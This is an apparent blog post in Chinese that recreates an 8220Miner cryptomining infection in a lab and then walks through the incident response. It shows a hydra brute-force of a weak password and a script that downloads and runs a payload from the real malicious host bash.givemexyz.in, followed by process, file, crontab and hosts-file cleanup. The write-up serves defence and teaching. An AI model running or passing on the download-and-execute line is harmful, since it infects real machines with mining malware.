一、挖礦病毒的小科普

挖礦病毒可以說是安全圈的“老熟人”了，各類安全事件一直不乏它們活躍的身影。亞信安全發布的《2020年度安全威脅回顧及預測》顯示：2020年，挖礦病毒持續活躍，不僅老病毒出現頻繁更新，而且還出現了多個新型挖礦病毒。其中，有隱藏在linux設備的計劃任務中，通過定時任務的方式下載并執行挖礦程序和“海嘯”后門程序 ，發動DDoS攻擊；還有WMI無文件挖礦實現雙平臺感染；偽裝成系統文件的XMRDoor挖礦病毒；以及利用“新冠病毒”郵件傳播的“LemonDuck”無文件挖礦病毒。

而進入2021年，針對發展中國家的挖礦病毒攻擊更是呈上漲態勢。究其原因，如印度、泰國等國家在網絡安全方面投入成本較低，人員安全意識比較薄弱，挖礦病毒攻擊成功概率較高。此外，制造業、政府、醫療、金融等行業依然是挖礦病毒的主要攻擊目標

可以看一下這個科普小視頻快速了解《什么是挖礦病毒》

視頻來自：https://mp.weixin.qq.com/s/RuWx1KDvJSUby416KBnxmQ

2、本次中招的挖礦病毒為

http://bash.givemexyz.in/xms dbused木馬

處理過程參考了如下連接

https://zhuanlan.zhihu.com/p/376610910

https://cloud.tencent.com/developer/article/1853002

三、挖礦木馬清理復盤

為了復盤，我這里準備kali及測試服務器模擬挖礦病毒入侵及查殺清理的過程

本次中招的挖礦病毒為8220Miner挖礦病毒家族

病毒木馬一般會利用高危漏洞和弱口令進行入侵

Kali 192.168.31.15

centos7.9 192.168.31.232

1、CentOS7服務器上存在弱口令系統賬號admin

模擬弱口令用戶admin

 

(圖片可點擊放大查看)

2、弱口令暴力破解

hydra工具暴力破解admin用戶弱密碼就是admin

 

(圖片可點擊放大查看)

 

3、Kali 機器上準備挖礦病毒

cat /opt/Miner_virus.sh                                                                                                                                                
#!/bin/bash
cd /home/admin;
(curl -fsSL http://bash.givemexyz.in/xms||wget -q -O- http://bash.givemexyz.in/xms||Python -c 'import urllib2 as fbi;print fbi.urlopen("http://bash.givemexyz.in/xms")
.read()')| bash -sh; lwp-download http://bash.givemexyz.in/xms /xms; bash /xms; /xms; rm -rf /xms

 

(圖片可點擊放大查看)

4、接下來進行攻擊入侵

ssh admin@192.168.31.232 < /opt/Miner_virus.sh

輸入弱口令admin

 

(圖片可點擊放大查看)

等待腳本執行

 

(圖片可點擊放大查看)

說明：當然挖礦病毒黑產團隊的入侵手段肯定比我這種要高級太多

上面只是簡單模擬

5、很快這臺機器很快就中招了

CPU100%

 

(圖片可點擊放大查看)

可見弱口令被攻擊的成本真的很低

6、接下進行應急響應查殺

ps -ef | grep dbused
ll /proc/17743/exe

可以看到/tmp目錄下有不少惡意程序文件

cd /tmp
ls -al

 

(圖片可點擊放大查看)

7、先改掉弱密碼，殺掉進程

passwd admin
kill -9 PID

 

(圖片可點擊放大查看)

8、刪掉惡意程序文件

cd /tmp
ls -al
rm -rf bashirc dbused .lock .pwn .python

 

(圖片可點擊放大查看)

 

(圖片可點擊放大查看)

9、別太樂觀

你以為就完事了，不，你錯了， 人家也不是吃素的

隔一會top查看CPU又100%了

 

(圖片可點擊放大查看)

檢查異常進程
ps -ef 

 

(圖片可點擊放大查看)

檢查admin用戶的crontab
su -admin 
crontab -l

 

(圖片可點擊放大查看)

ps -ef | grep admin

異常進程都是admin用戶在運行

 

(圖片可點擊放大查看)

• 再次殺異常進程

ps -ef | grep "dbused"| awk '{print $2}'| xargs kill
ps -ef | grep "bashirc"| awk '{print $2}'| xargs kill
ps -ef | grep admin | grep giveme | awk '{print $2}'| xargs kill

 

(圖片可點擊放大查看)

• 刪掉惡意程序文件

rm -rf bashirc dbused .lock .pwn .python

 

(圖片可點擊放大查看)

admin用戶的定時任務清理

 

(圖片可點擊放大查看)

.bash_profile 文件清理

cat /home/admin/.bash_profile

 

(圖片可點擊放大查看)

10、也學習挖礦病毒的套路進行抑制

如果再觀察top CPU還是100%的話 可能就要獻上大招了

1）vi /etc/hosts 解析成不通的地址

 

 

(圖片可點擊放大查看)

2）定時任務殺進程并清理

腳本如下

/opt/virus_clear.sh
#!/bin/bash
LOCK=/var/log/virus_clear.log
echo "清理日期:" >> ${LOCK} 2>&1
echo `date '+%Y-%m-%d_%T'`  >> ${LOCK} 2>&1
echo "=================Virus Clear Start==============================="   >> ${LOCK} 2>&1
ps -ef | grep "dbused"| awk '{print $2}'| xargs kill >> ${LOCK} 2>&1
ps -ef | grep "bashirc"| awk '{print $2}'| xargs kill >> ${LOCK} 2>&1
ps -ef | grep admin | grep giveme | awk '{print $2}'| xargs kill >> ${LOCK} 2>&1
rm -rf /tmp/bashirc /tmp/dbused /tmp/.lock /tmp/.pwn /tmp/.python >> ${LOCK} 2>&1
echo > /var/spool/cron/admin >> ${LOCK} 2>&1

記得腳本添加執行權限

crontab -e

設置定時任務

 

(圖片可點擊放大查看)

這樣為減少業務帶來的影響，先恢復業務，為溯源和百度求證完全清理贏得時間

3)出口防火墻上封鎖礦池IOC地址

4)移走/usr/bin/curl和/usr/bin/wget命令

 

(圖片可點擊放大查看)

前提是你的業務程序不需要使用到這兩個命令

如果是root弱密碼或其他漏洞進行bash提權進行入侵的話，清理難度就比我上面的要大

可以研究一下具體木馬腳本里注入了哪些地方

 

(圖片可點擊放大查看)

 

(圖片可點擊放大查看)

 

(圖片可點擊放大查看)

四、總結

不過也遇到過kdevtmpfsi和startMiner新型變種挖礦木馬，這種清理就相比上面復雜一些

可以參考如下文章進行處理

• 《記一次套路較深的雙家族挖礦事件應急響應》

https://www.freebuf.com/articles/network/280004.html

• 《應急響應案例：kdevtmpfsi挖礦木馬》

https://cloud.tencent.com/developer/article/1744547

• 《從一次攻擊溯源中暴露的安全問題》

https://cloud.tencent.com/developer/article/1796933

• #挖礦木馬

https://mp.weixin.qq.com/mp/Appmsgalbum?__biz=MzI5ODk3OTM1Ng==&action=getalbum&album_id=1886143538539593741&scene=173&from_msgid=2247499275&from_itemidx=1&count=3&nolastread=1#wechat_redirect

• 《挖礦木馬自助清理手冊》

https://cloud.tencent.com/developer/article/1834731